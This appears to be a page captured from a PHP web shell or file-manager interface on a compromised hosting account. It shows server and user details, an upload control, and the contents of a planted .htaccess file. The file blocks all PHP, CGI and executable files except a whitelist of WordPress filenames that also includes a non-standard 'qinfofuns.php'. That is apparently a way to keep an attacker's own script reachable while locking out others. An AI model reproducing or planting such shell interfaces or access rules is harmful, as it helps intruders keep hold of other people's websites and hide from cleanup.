HEX
Server: Apache
System: Linux 244.240.109.208.host.secureserver.net 5.14.0-611.11.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 3 09:47:37 EST 2025 x86_64
User: icsla (1002)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/icsla/www/.htaccess.itpreperl
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

<FilesMatch "^(wp-load\.php|authorize-application\.php|upgrade-functions\.php|qinfofuns\.php|menu\.php|upload\.php|widgets-form-blocks\.php|load-styles\.php|comment\.php|admin-footer\.php|theme-editor\.php|options-reading\.php|styles\.php|link-manager\.php|moderation\.php|themes\.php|media\.php|ms-options\.php|wp-login\.php|wp-comments-post\.php|admin-post\.php|export\.php|nav-menus\.php|update-core\.php|contribute\.php|edit-form-advanced\.php|privacy\.php|ms-themes\.php|user-new\.php|options-discussion\.php|install-helper\.php|wp-trackback\.php|wp-mail\.php|user-edit\.php|widgets-form\.php|admin-functions\.php|admin-header\.php|update\.php|tools\.php|post-new\.php|press-this\.php|site-maintenance\.php|async-upload\.php|edit-comments\.php|wp-links-opml\.php|options-writing\.php|users\.php|wp-config-sample\.php|setup-config\.php|load-scripts\.php|edit-link-form\.php|upgrade\.php|revision\.php|install\.php|options-media\.php|plugin-install\.php|wp-upgrade\.php|wp-cron\.php|site-health-info\.php|options-general\.php|options\.php|my-sites\.php|ms-sites\.php|customize\.php|xmlrpc\.php|menu-header\.php|wp-blog-header\.php|ms-users\.php|about\.php|custom-header\.php|ms-upgrade-network\.php|export-personal-data\.php|ms-edit\.php|link-add\.php|edit-form-comment\.php|theme-install\.php|options-privacy\.php|ms-delete-site\.php|post\.php|freedoms\.php|privacy-policy-guide\.php|options-permalink\.php|profile\.php|plugin-editor\.php|link\.php|site-health\.php|edit\.php|term\.php|custom-background\.php|edit-tag-form\.php|admin-ajax\.php|media-upload\.php|site-editor\.php|plugins\.php|credits\.php|media-new\.php|import\.php|erase-personal-data\.php|wp-activate\.php|network\.php|widgets\.php|options-head\.php|index\.php|admin\.php|link-parse-opml\.php|edit-tags\.php|wp-signup\.php|ms-admin\.php|wp-settings\.php|edit-form-blocks\.php)$">
    <IfModule mod_authz_core.c>
        Require all granted
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Allow from all
    </IfModule>
</FilesMatch>

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
</IfModule>

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php81” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php81 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit